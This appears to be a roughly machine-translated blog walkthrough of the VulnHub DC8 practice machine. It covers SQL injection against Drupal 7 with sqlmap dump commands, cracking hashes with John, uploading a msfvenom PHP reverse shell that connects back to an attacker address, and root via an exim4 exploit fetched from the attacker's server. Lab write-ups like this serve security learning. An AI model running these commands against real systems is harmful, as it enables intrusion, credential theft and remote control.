Vulnhub's DC8

Dear friends , But look at the master directly

https://blog.csdn.net/weixin_44288604/article/details/122944302

Personal writing is very rough
DC8 Its own difficulty is low , You can easily obtain the target permission , General idea

 The host found , Port scanning —— Exploit service vulnerabilities —— Get background permissions —— Upload shell—— Raise the right 

The host found , Port scanning , Service detection

Total open 2 Ports ,80 and 22 port ,80 The services with open ports are drupal 7, Open the interface for detection , Here use burpsuit union xray To test
burpsuit Of user option Set your own idle agent in the operation bar , function xray that will do , As shown in the figure below Use here bp Test with your own browser , Then click on the interface , Click on each function node
Click to http://192.168.43.142/?nid=3 In this interface ,xray The presence of sql Inject , Go straight up sqlmap
Two databases were found ,d7db,information_schema, Choose the first one here d7db, View table name

sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables

Choose from a variety of tables users surface , Direct download

sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump

Two users were found ,admin and john, But the password is the encrypted data , Try brute force cracking , Make these two ciphertexts into a dictionary , Use john To crack violently , Burst out of it john The password for turtle, Log in backstage , View to upload shell The location of , It is recommended to use Google browser , Don't ask , Ask is to be able to right-click translation

In this interface , You can define the interface after entering the form , Here the msf Generate php The Trojan horse bounced , It has been generated , No display

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128  LPORT=8888 -f raw > shell.php

Open the file , Copy the file to the location shown above , choice PHP code, And save , Then submit the data in recheck format in the corresponding form , You can accept the session

python Interactive shell, Find yes sudo Permission to execute the file

find / -perm -u=s -type f 2>/dev/null

found exim4 by sudo jurisdiction , View version , Find corresponding exp
exp Dafa , Download the second one here , Then copy it to the attacker , Use python Turn on http service , The target machine downloads and runs

get root jurisdiction